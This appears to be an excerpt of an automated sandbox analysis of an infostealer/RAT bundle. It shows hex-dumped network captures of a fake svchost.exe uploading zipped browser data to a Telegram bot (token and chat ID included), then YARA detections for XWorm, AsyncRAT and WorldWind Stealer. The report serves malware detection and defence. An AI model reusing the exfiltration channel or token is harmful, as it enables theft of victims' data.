                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: 07 d7 7a 81 e4 14 06 af ed b9 7a 97 9b 17 d3 15 f6 63 56 73 5b 1f 92 bd e8 92 55 f0 d5 1a 5e 45 85 1e 6e 8e 07 8f 7c bc 6c 06 b5 40 68 bb 6e ec 6a 83 e8 1b 80 7c f2 0e 53 d6 4a 5f 8b d2 63 0d a7 a9 75 84 30 6b 5d 19 f7 b1 a9 bc f7 e9 de 0c e8 c0 96 22 41 85 7c be 56 a7 2f 29 b7 bb 2c f4 31 db d5 dd a4 6b 3b 16 07 c6 cc 8b 65 54 e5 fc 87 2a af 1d a4 35 a9 fb e6 cd c8 5b 47 87 50 20 0c 19 61 b4 35 15 4e 15 e7 b1 5a 53 ef 99 63 94 aa 54 0e 2b 45 a8 d8 07 95 94 3a 79 13 d4 4c f3 b4 08 fa a2 bf bc d2 94 0b bd 4e 7a 9f d7 21 b9 00 c6 16 e7 d9 a3 0d 14 dd fa 54 ba cd 9e 15 d7 06 33 30 a5 69 8c 2b 25 e8 4f 3b 13 21 d1 bc 6f 1a e6 af af fa df 2e 0e f1 d8 7a 8b 42 6d 2c 0e 89 ea a4 60 2a 88 ae 9e 3c 78 df 21 07 27 78 07 54 77 23 29 f7 e8 13 dd 6f a5 53 55 c9 b7 b4
                                                  Data Ascii: zzcVs[U^En|l@hnj|SJ_cu0k]"A|V/),1k;eT*5[GP a5NZScT+E:yLNz!T30i+%O;!o.zBm,`*<x!'xTw#)oSU
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: 26 d8 21 b3 07 6f fb 3c 0d b2 91 07 49 a7 90 d6 19 9b 23 3c 0c 7d 0b 08 60 96 68 fa a3 04 62 27 48 a2 b1 30 58 e7 ca f4 cd a1 cc 67 2e d7 59 53 bd c8 96 63 ca b5 a5 ea 93 b5 9f 93 f5 d9 c3 18 ab 41 fb 25 a2 de 34 cd 80 05 b2 4f 63 d4 57 06 1b 36 ca 83 17 f5 aa 3d 10 1a cd 20 7a b4 24 c7 4c 25 bc a7 75 6c 12 b3 c3 d1 4f 66 1a a8 6d 12 57 4f 39 e9 ad 96 76 83 f3 0a 9b d7 27 2b e6 97 a1 ed e4 99 c9 5c ae 55 7e 65 92 42 d5 8f 7d 45 7f 13 28 04 a8 7d bd ab 31 da ad ed 4e 85 61 ce 78 ea 14 66 25 2e ce b2 c3 39 3e 3f 23 ba 05 99 aa 0d af b3 e1 6a de c5 1c 2e 27 be 2f 4a eb a2 61 f8 4f de 23 5f 3b bc 62 90 32 21 19 b2 84 c7 97 97 f5 79 1e 17 d5 41 99 b0 30 96 7c 07 96 da 7b 5a df 51 67 02 b7 37 9e 92 a4 d1 93 2a 91 45 5e 4e 60 bd c4 d5 36 46 d7 05 48 ef dd e5 df
                                                  Data Ascii: &!o<I#<}`hb'H0Xg.YScA%4OcW6= z$L%ulOfmWO9v'+\U~eB}E(}1Naxf%.9>?#j.'/JaO#_;b2!yA0|{ZQg7*E^N`6FH
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: cf 38 20 8d d7 fe 74 af ee b7 f2 81 6d d0 d9 b1 11 72 1a 03 be 9a 52 98 d7 93 03 98 d9 da 38 d5 f1 4e 19 0e a8 53 c7 42 90 cf 7f 22 7b e2 ca cf 4f cc b6 f2 f5 b4 09 ff ab 7d 9f d4 ed af 98 1a 2b 5a e2 85 d3 d6 45 1f d8 b8 37 28 96 d2 dc 1a 4f a1 58 8c bc 0a 3e 58 ba dc df db fa 89 65 c3 44 36 03 d2 09 da e8 0c 23 4f 09 57 5b 3b fc cf 78 35 18 2e f1 29 65 c5 1e 22 9f 3b 72 c5 2f e5 16 3b c6 b1 e7 82 47 f0 f3 f7 4f 70 80 ac fe f4 e1 32 f2 7b 3e d7 3b d1 5c 66 42 a3 e6 49 69 1d 0d ba 67 4f e2 42 7f b7 b7 cd 12 7f 69 f8 75 c2 50 47 d0 37 31 de 2a ad 51 25 a1 2d c9 48 1d a9 a4 4c e4 73 f3 bf 71 0e 78 f8 7f d1 ce 87 45 eb 98 aa 52 a1 06 27 8e 92 fa c0 70 bd 45 0a c9 a7 48 9a 93 f0 d9 de 5f 3e 04 7f 3f eb e1 3e a5 6c bb e8 78 b6 ba ba cb b3 80 b6 5b ac 24 e2 b2
                                                  Data Ascii: 8 tmrR8NSB"{O}+ZE7(OX>XeD6#OW[;x5.)e";r/;GOp2{>;\fBIigOBiuPG71*Q%-HLsqxER'pEH_>?>lx[$
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: 68 3d 7a 52 a2 fa c5 aa cc 1c 54 23 d3 fa 7e b0 87 4d 20 44 78 c8 ef 32 3a 47 43 68 33 8c bd 61 6c 8b 35 64 9b 8b 75 85 2d 82 0f f5 88 25 80 78 c5 ce 97 45 66 f4 d6 f8 5b 5e dd 54 cc b8 c6 67 1f ab 2a f0 49 a5 d8 85 c2 b6 77 20 3b 84 60 be 20 4f ce d5 60 57 9b 1f 93 67 83 0d ab ab 87 a9 9e 13 ae ce d7 e6 55 a7 76 fc 39 fb ee 5e 6c 93 d5 b3 f0 bc 92 75 17 29 a7 33 b5 5c 35 a6 99 97 63 64 fa d3 ac 39 6b cc ac 55 1a ed 22 55 10 66 1d fd 89 74 81 e7 75 18 65 7f 0f 19 af cf 60 e4 eb 87 5c 93 97 bf e5 3b 2f 0b c7 90 5c 0e 26 59 11 5d 48 17 a0 10 df 00 4b dc e5 a5 e4 4f 67 52 a9 74 c7 01 d9 4a 4e 4e c2 48 46 a3 d0 b7 49 da 08 eb 61 87 16 8c 89 a0 f0 48 4c 39 c4 c6 3c 69 f1 31 b1 44 42 58 b3 0f 66 f7 84 ef c1 d4 aa 56 ed 30 09 fa 56 16 67 18 6f fb 07 9e a8 3b 7b
                                                  Data Ascii: h=zRT#~M Dx2:GCh3al5du-%xEf[^Tg*Iw ;` O`WgUv9^lu)3\5cd9kU"Uftue`\;/\&Y]HKOgRtJNNHFIaHL9<i1DBXfV0Vgo;{
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: 7b aa d9 19 b4 d5 75 9f af f7 c3 7c 6a fe ad 0b 52 08 2a 19 b7 32 e7 54 8b d4 f9 d8 cb 3d 49 d9 5a 4f dd e3 f8 9a 62 9c 1b 68 27 ae f9 29 70 5f a6 63 a2 fb 10 29 b5 da 11 a1 ae f6 c1 68 d4 61 35 1b 07 bc dd ec 49 24 d3 d5 9a 5c f0 39 b6 ff fc 61 4d da c1 5f e3 cb a7 41 0e 8c de 8e 5b bc d9 0b af fd 84 2f e1 e2 59 d7 3e ca c9 ef 10 bf 36 0e df d1 35 99 6a 77 12 6a 0a 89 3f f2 ae ec 7e bd d9 0e be f6 80 8a 38 6f d2 d0 fb cd 7b a4 5a 5d 19 a6 a2 aa cc e7 d3 2d 1b af d3 d6 87 53 8c 28 b5 0a 07 d8 57 df 99 76 80 7c af 3b ec 6d 75 ca ce 89 92 72 2d b3 7b 8e b3 ff cd f1 c9 fc e0 9d 07 af 0b c9 35 be 50 04 c5 44 56 a6 da 44 e8 46 ee af 1e 9a ef 09 27 48 96 3d 9a b7 2e 29 aa e7 5d df d9 80 53 28 69 9a c2 30 2a f1 93 0c 5d 31 b7 96 b3 78 e6 65 ad 80 b6 2b eb ec 87
                                                  Data Ascii: {u|jR*2T=IZObh')p_c)ha5I$\9aM_A[/Y>65jwj?~8o{Z]-S(Wv|;mur-{5PDVDF'H=.)]S(i0*]1xe+
                                                  2024-09-03 04:16:44 UTC16355OUTData Raw: e1 b5 78 08 b9 b1 57 ac 49 1a f2 5b 13 00 f7 27 d7 05 64 90 63 6b 1e d0 63 e4 02 fe c8 ae b3 a7 c3 10 84 2e 72 2f af b6 35 c2 b0 48 a3 9f 7c fa 26 31 06 71 d0 86 90 67 5e 51 89 93 33 b7 e0 61 c8 d7 1b 43 76 74 0c d9 12 d2 e3 21 d6 81 00 57 ff fa e6 9e 1f cf 26 59 96 0c be e4 cf 13 45 23 76 f3 f6 f2 92 0b 9b 03 e1 de 2c 6e e0 7d 71 d2 6b 60 1e ff a3 d3 05 af 26 98 27 58 10 a2 4f 6d 1f f5 56 03 a3 c4 96 c1 65 18 0c eb 3a e2 c9 b3 3c eb 46 02 40 41 cc 06 85 69 1f 74 3e 2b cd cf ca b2 9a f2 fc 45 1b 98 ed 38 90 93 b2 0f 93 fc 59 8f f5 82 57 4e a5 4e 03 89 f9 63 80 b9 51 31 8c 98 4c a2 15 85 77 20 2b 2c ed 05 b3 26 03 32 5f 62 a6 94 32 20 4b 59 84 24 3e 57 4d 53 c6 d7 d6 f1 2c 57 e2 c3 71 0c a8 ef d7 be 40 dd 19 a6 dc 54 07 ad 24 78 87 53 52 53 3b 82 70 b6 fb
                                                  Data Ascii: xWI['dckc.r/5H|&1qg^Q3aCvt!W&YE#v,n}qk`&'XOmVe:<F@Ait>+E8YWNNcQ1Lw +,&2_b2 KY$>WMS,Wq@T$xSRS;p
                                                  2024-09-03 04:16:48 UTC856INHTTP/1.1 200 OK
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:47 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 468
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  {"ok":true,"result":{"message_id":6744,"from":{"id":7479631857,"is_bot":true,"first_name":"vdx3bot","username":"vdx3121Bot"},"chat":{"id":6291749148,"first_name":"VD","type":"private"},"date":1725337007,"document":{"file_name":"C_UsersuserAppDataLocal9493d1ccde8944e0fb5ffbe9b1372244user@.zip","mime_type":"application/zip","file_id":"BQACAgUAAxkDAAIaWGbWja95dBoCtxg9zg-S1vgWZDDqAAJnDwACvuixVtF91lmts9CWNQQ","file_unique_id":"AgADZw8AAr7osVY","file_size":160371}}}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  10192.168.2.549734149.154.167.2204431716C:\Users\user\AppData\Roaming\svchost.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-09-03 04:16:48 UTC254OUTPOST /bot1119746739:AAGMhvpUjXI4CzIfizRC--VXilxnkJlhaf8/sendDocument?chat_id=1096425866 HTTP/1.1
                                                  Content-Type: multipart/form-data; boundary="f2e02031-2c41-4dad-a28a-f3bbaaed3e95"
                                                  Host: api.telegram.org
                                                  Content-Length: 160724
                                                  Expect: 100-continue
                                                  2024-09-03 04:16:48 UTC25INHTTP/1.1 100 Continue
                                                  2024-09-03 04:16:48 UTC40OUTData Raw: 2d 2d 66 32 65 30 32 30 33 31 2d 32 63 34 31 2d 34 64 61 64 2d 61 32 38 61 2d 66 33 62 62 61 61 65 64 33 65 39 35 0d 0a
                                                  Data Ascii: --f2e02031-2c41-4dad-a28a-f3bbaaed3e95
                                                  2024-09-03 04:16:48 UTC269OUTData Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 39 34 39 33 64 31 63 63 64 65 38 39 34 34 65 30 66 62 35 66 66 62 65 39 62 31 33 37 32 32 34 34 5c 61 6c 66 6f 6e 73 40 39 33 36 39 30 35 5f 65 6e 2d 43 48 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 39 34 39 33 64 31 63 63 64 65 38 39 34 34 65 30 66 62 35 66 66 62 65 39 62 31 33 37 32 32 34 34 25 35 43 61 6c 66 6f 6e 73 25 34 30 39 33 36 39 30 35
                                                  Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\9493d1ccde8944e0fb5ffbe9b1372244\user@936905_en-CH.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5C9493d1ccde8944e0fb5ffbe9b1372244%5Cuser%40936905
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 00 00 00 b3 28 23 59 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 42 72 6f 77 73 65 72 73 5c 45 64 67 65 5c 50 4b 03 04 14 00 00 00 00 00 b3 28 23 59 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 42 72 6f 77 73 65 72 73 5c 47 6f 6f 67 6c 65 5c 50 4b 03 04 14 00 00 00 08 00 02 02 23 59 63 c2 65 e7 53 00 00 00 5e 00 00 00 1c 00 00 00 42 72 6f 77 73 65 72 73 5c 46 69 72 65 66 6f 78 5c 48 69 73 74 6f 72 79 2e 74 78 74 53 56 56 56 70 cb 2c 4a 4d cb af 50 08 28 ca 2c 4b 4c ae 54 f0 cb 2f c9 4c 4e 55 78 d4 30 45 c1 37 bf 2a 33 27 27 51 41 19 a8 4c 23 a3 a4 a4 a0 d8 4a 5f bf bc bc 5c 2f 17 22 a1 97 5f 94 ae 9f 9a a7 1b 1a ac 5f 00 d1 ad 9f 06 31 4d 5f 53 c1 90 0b 00 50 4b 03 04 14 00 00 00 08 00 02 02 23 59 30 82 18 88 35 01 00 00 2e 03
                                                  Data Ascii: PK(#YBrowsers\Edge\PK(#YBrowsers\Google\PK#YceS^Browsers\Firefox\History.txtSVVVp,JMP(,KLT/LNUx0E7*3''QAL#J_\/"__1M_SPK#Y05.
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: fa 82 6f a5 13 92 78 6b 4d bb 60 a4 42 6b b5 f7 fd 4e c2 5a 94 2c 77 91 92 f7 f5 dc 64 f9 e2 84 96 40 ba ab c8 b1 b9 ec 5e 3a 30 b3 f7 3e 25 8f f6 dc 14 e7 d5 37 28 47 0e 1b 43 4b f1 a3 4f fc 0d 48 93 0e 86 33 d5 e9 6d cb a2 8a 49 a6 d4 43 54 0c 4b 9b 7d ec 65 4a a9 01 d7 d9 25 59 15 b8 11 d9 ee ce 4c 3c 92 74 33 a7 f1 d6 58 54 98 c5 c2 41 c4 fd 3e ce f5 5e 6f 15 e6 ad 78 c9 94 74 70 4e 1f 06 c1 de 51 49 cc 47 ca be b1 e8 b3 4e f6 6b ab b8 c1 fb 11 e7 e7 67 b8 3a 8a 7f de d4 ea 6d 31 94 ab 30 0c e4 21 58 3e 7b 95 77 c0 5f 0d 64 82 81 1b f5 2a b5 0b dd 7e dc f3 bc 53 92 94 6b d3 c4 62 a8 25 7f b8 6b ca b8 09 3e 58 e0 ca e4 ac a9 8a 0a 1d 43 8d 90 0f 5a 67 9c eb 0a 3c 0e 1a 4f c7 1a f6 a6 5a 5d 79 99 dc b9 b3 85 7a 47 18 ca b1 aa 94 e3 53 3b ab 43 6e 06 73
                                                  Data Ascii: oxkM`BkNZ,wd@^:0>%7(GCKOH3mICTK}eJ%YL<t3XTA>^oxtpNQIGNkg:m10!X>{w_d*~Skb%k>XCZg<OZ]yzGS;Cns
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: 07 d7 7a 81 e4 14 06 af ed b9 7a 97 9b 17 d3 15 f6 63 56 73 5b 1f 92 bd e8 92 55 f0 d5 1a 5e 45 85 1e 6e 8e 07 8f 7c bc 6c 06 b5 40 68 bb 6e ec 6a 83 e8 1b 80 7c f2 0e 53 d6 4a 5f 8b d2 63 0d a7 a9 75 84 30 6b 5d 19 f7 b1 a9 bc f7 e9 de 0c e8 c0 96 22 41 85 7c be 56 a7 2f 29 b7 bb 2c f4 31 db d5 dd a4 6b 3b 16 07 c6 cc 8b 65 54 e5 fc 87 2a af 1d a4 35 a9 fb e6 cd c8 5b 47 87 50 20 0c 19 61 b4 35 15 4e 15 e7 b1 5a 53 ef 99 63 94 aa 54 0e 2b 45 a8 d8 07 95 94 3a 79 13 d4 4c f3 b4 08 fa a2 bf bc d2 94 0b bd 4e 7a 9f d7 21 b9 00 c6 16 e7 d9 a3 0d 14 dd fa 54 ba cd 9e 15 d7 06 33 30 a5 69 8c 2b 25 e8 4f 3b 13 21 d1 bc 6f 1a e6 af af fa df 2e 0e f1 d8 7a 8b 42 6d 2c 0e 89 ea a4 60 2a 88 ae 9e 3c 78 df 21 07 27 78 07 54 77 23 29 f7 e8 13 dd 6f a5 53 55 c9 b7 b4
                                                  Data Ascii: zzcVs[U^En|l@hnj|SJ_cu0k]"A|V/),1k;eT*5[GP a5NZScT+E:yLNz!T30i+%O;!o.zBm,`*<x!'xTw#)oSU
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: 26 d8 21 b3 07 6f fb 3c 0d b2 91 07 49 a7 90 d6 19 9b 23 3c 0c 7d 0b 08 60 96 68 fa a3 04 62 27 48 a2 b1 30 58 e7 ca f4 cd a1 cc 67 2e d7 59 53 bd c8 96 63 ca b5 a5 ea 93 b5 9f 93 f5 d9 c3 18 ab 41 fb 25 a2 de 34 cd 80 05 b2 4f 63 d4 57 06 1b 36 ca 83 17 f5 aa 3d 10 1a cd 20 7a b4 24 c7 4c 25 bc a7 75 6c 12 b3 c3 d1 4f 66 1a a8 6d 12 57 4f 39 e9 ad 96 76 83 f3 0a 9b d7 27 2b e6 97 a1 ed e4 99 c9 5c ae 55 7e 65 92 42 d5 8f 7d 45 7f 13 28 04 a8 7d bd ab 31 da ad ed 4e 85 61 ce 78 ea 14 66 25 2e ce b2 c3 39 3e 3f 23 ba 05 99 aa 0d af b3 e1 6a de c5 1c 2e 27 be 2f 4a eb a2 61 f8 4f de 23 5f 3b bc 62 90 32 21 19 b2 84 c7 97 97 f5 79 1e 17 d5 41 99 b0 30 96 7c 07 96 da 7b 5a df 51 67 02 b7 37 9e 92 a4 d1 93 2a 91 45 5e 4e 60 bd c4 d5 36 46 d7 05 48 ef dd e5 df
                                                  Data Ascii: &!o<I#<}`hb'H0Xg.YScA%4OcW6= z$L%ulOfmWO9v'+\U~eB}E(}1Naxf%.9>?#j.'/JaO#_;b2!yA0|{ZQg7*E^N`6FH
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: cf 38 20 8d d7 fe 74 af ee b7 f2 81 6d d0 d9 b1 11 72 1a 03 be 9a 52 98 d7 93 03 98 d9 da 38 d5 f1 4e 19 0e a8 53 c7 42 90 cf 7f 22 7b e2 ca cf 4f cc b6 f2 f5 b4 09 ff ab 7d 9f d4 ed af 98 1a 2b 5a e2 85 d3 d6 45 1f d8 b8 37 28 96 d2 dc 1a 4f a1 58 8c bc 0a 3e 58 ba dc df db fa 89 65 c3 44 36 03 d2 09 da e8 0c 23 4f 09 57 5b 3b fc cf 78 35 18 2e f1 29 65 c5 1e 22 9f 3b 72 c5 2f e5 16 3b c6 b1 e7 82 47 f0 f3 f7 4f 70 80 ac fe f4 e1 32 f2 7b 3e d7 3b d1 5c 66 42 a3 e6 49 69 1d 0d ba 67 4f e2 42 7f b7 b7 cd 12 7f 69 f8 75 c2 50 47 d0 37 31 de 2a ad 51 25 a1 2d c9 48 1d a9 a4 4c e4 73 f3 bf 71 0e 78 f8 7f d1 ce 87 45 eb 98 aa 52 a1 06 27 8e 92 fa c0 70 bd 45 0a c9 a7 48 9a 93 f0 d9 de 5f 3e 04 7f 3f eb e1 3e a5 6c bb e8 78 b6 ba ba cb b3 80 b6 5b ac 24 e2 b2
                                                  Data Ascii: 8 tmrR8NSB"{O}+ZE7(OX>XeD6#OW[;x5.)e";r/;GOp2{>;\fBIigOBiuPG71*Q%-HLsqxER'pEH_>?>lx[$
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: 68 3d 7a 52 a2 fa c5 aa cc 1c 54 23 d3 fa 7e b0 87 4d 20 44 78 c8 ef 32 3a 47 43 68 33 8c bd 61 6c 8b 35 64 9b 8b 75 85 2d 82 0f f5 88 25 80 78 c5 ce 97 45 66 f4 d6 f8 5b 5e dd 54 cc b8 c6 67 1f ab 2a f0 49 a5 d8 85 c2 b6 77 20 3b 84 60 be 20 4f ce d5 60 57 9b 1f 93 67 83 0d ab ab 87 a9 9e 13 ae ce d7 e6 55 a7 76 fc 39 fb ee 5e 6c 93 d5 b3 f0 bc 92 75 17 29 a7 33 b5 5c 35 a6 99 97 63 64 fa d3 ac 39 6b cc ac 55 1a ed 22 55 10 66 1d fd 89 74 81 e7 75 18 65 7f 0f 19 af cf 60 e4 eb 87 5c 93 97 bf e5 3b 2f 0b c7 90 5c 0e 26 59 11 5d 48 17 a0 10 df 00 4b dc e5 a5 e4 4f 67 52 a9 74 c7 01 d9 4a 4e 4e c2 48 46 a3 d0 b7 49 da 08 eb 61 87 16 8c 89 a0 f0 48 4c 39 c4 c6 3c 69 f1 31 b1 44 42 58 b3 0f 66 f7 84 ef c1 d4 aa 56 ed 30 09 fa 56 16 67 18 6f fb 07 9e a8 3b 7b
                                                  Data Ascii: h=zRT#~M Dx2:GCh3al5du-%xEf[^Tg*Iw ;` O`WgUv9^lu)3\5cd9kU"Uftue`\;/\&Y]HKOgRtJNNHFIaHL9<i1DBXfV0Vgo;{
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: 7b aa d9 19 b4 d5 75 9f af f7 c3 7c 6a fe ad 0b 52 08 2a 19 b7 32 e7 54 8b d4 f9 d8 cb 3d 49 d9 5a 4f dd e3 f8 9a 62 9c 1b 68 27 ae f9 29 70 5f a6 63 a2 fb 10 29 b5 da 11 a1 ae f6 c1 68 d4 61 35 1b 07 bc dd ec 49 24 d3 d5 9a 5c f0 39 b6 ff fc 61 4d da c1 5f e3 cb a7 41 0e 8c de 8e 5b bc d9 0b af fd 84 2f e1 e2 59 d7 3e ca c9 ef 10 bf 36 0e df d1 35 99 6a 77 12 6a 0a 89 3f f2 ae ec 7e bd d9 0e be f6 80 8a 38 6f d2 d0 fb cd 7b a4 5a 5d 19 a6 a2 aa cc e7 d3 2d 1b af d3 d6 87 53 8c 28 b5 0a 07 d8 57 df 99 76 80 7c af 3b ec 6d 75 ca ce 89 92 72 2d b3 7b 8e b3 ff cd f1 c9 fc e0 9d 07 af 0b c9 35 be 50 04 c5 44 56 a6 da 44 e8 46 ee af 1e 9a ef 09 27 48 96 3d 9a b7 2e 29 aa e7 5d df d9 80 53 28 69 9a c2 30 2a f1 93 0c 5d 31 b7 96 b3 78 e6 65 ad 80 b6 2b eb ec 87
                                                  Data Ascii: {u|jR*2T=IZObh')p_c)ha5I$\9aM_A[/Y>65jwj?~8o{Z]-S(Wv|;mur-{5PDVDF'H=.)]S(i0*]1xe+
                                                  2024-09-03 04:16:48 UTC16355OUTData Raw: e1 b5 78 08 b9 b1 57 ac 49 1a f2 5b 13 00 f7 27 d7 05 64 90 63 6b 1e d0 63 e4 02 fe c8 ae b3 a7 c3 10 84 2e 72 2f af b6 35 c2 b0 48 a3 9f 7c fa 26 31 06 71 d0 86 90 67 5e 51 89 93 33 b7 e0 61 c8 d7 1b 43 76 74 0c d9 12 d2 e3 21 d6 81 00 57 ff fa e6 9e 1f cf 26 59 96 0c be e4 cf 13 45 23 76 f3 f6 f2 92 0b 9b 03 e1 de 2c 6e e0 7d 71 d2 6b 60 1e ff a3 d3 05 af 26 98 27 58 10 a2 4f 6d 1f f5 56 03 a3 c4 96 c1 65 18 0c eb 3a e2 c9 b3 3c eb 46 02 40 41 cc 06 85 69 1f 74 3e 2b cd cf ca b2 9a f2 fc 45 1b 98 ed 38 90 93 b2 0f 93 fc 59 8f f5 82 57 4e a5 4e 03 89 f9 63 80 b9 51 31 8c 98 4c a2 15 85 77 20 2b 2c ed 05 b3 26 03 32 5f 62 a6 94 32 20 4b 59 84 24 3e 57 4d 53 c6 d7 d6 f1 2c 57 e2 c3 71 0c a8 ef d7 be 40 dd 19 a6 dc 54 07 ad 24 78 87 53 52 53 3b 82 70 b6 fb
                                                  Data Ascii: xWI['dckc.r/5H|&1qg^Q3aCvt!W&YE#v,n}qk`&'XOmVe:<F@Ait>+E8YWNNcQ1Lw +,&2_b2 KY$>WMS,Wq@T$xSRS;p
                                                  2024-09-03 04:16:49 UTC405INHTTP/1.1 401 Unauthorized
                                                  Server: nginx/1.18.0
                                                  Date: Tue, 03 Sep 2024 04:16:49 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 58
                                                  Connection: close
                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                  Access-Control-Allow-Origin: *
                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                  {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:0
                                                  Start time:00:15:53
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\Desktop\BTC.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\BTC.exe"
                                                  Imagebase:0x890000
                                                  File size:1'159'168 bytes
                                                  MD5 hash:F1424E5B9810A4A9C33506AA784FCA89
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2010752692.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:2
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\crack.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\crack.exe"
                                                  Imagebase:0x440000
                                                  File size:8'704 bytes
                                                  MD5 hash:9215015740C937980B6B53CEE5087769
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_Rezlt, Description: Yara detected Rezlt, Source: 00000002.00000000.2003529884.0000000000442000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_Rezlt, Description: Yara detected Rezlt, Source: C:\Users\user\AppData\Roaming\crack.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 92%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\Cracked.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\AppData\Roaming\Cracked.exe"
                                                  Imagebase:0xd80000
                                                  File size:75'776 bytes
                                                  MD5 hash:0DFA83A82F6418C73406D78296DE61BE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.2039417306.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.2004809524.0000000000D82000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: Joe Security
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Roaming\Cracked.exe, Author: ditekSHen
                                                  Antivirus matches:
                                                  • Detection: 87%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:00:15:54
                                                  Start date:03/09/2024
                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                  Imagebase:0x5b0000
                                                  File size:174'080 bytes
                                                  MD5 hash:96014694A042D8344B910BC47D79337B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000004.00000002.4469429984.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_WorldWindStealer, Description: Yara detected WorldWind Stealer, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000000.2005216319.00000000005B2000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
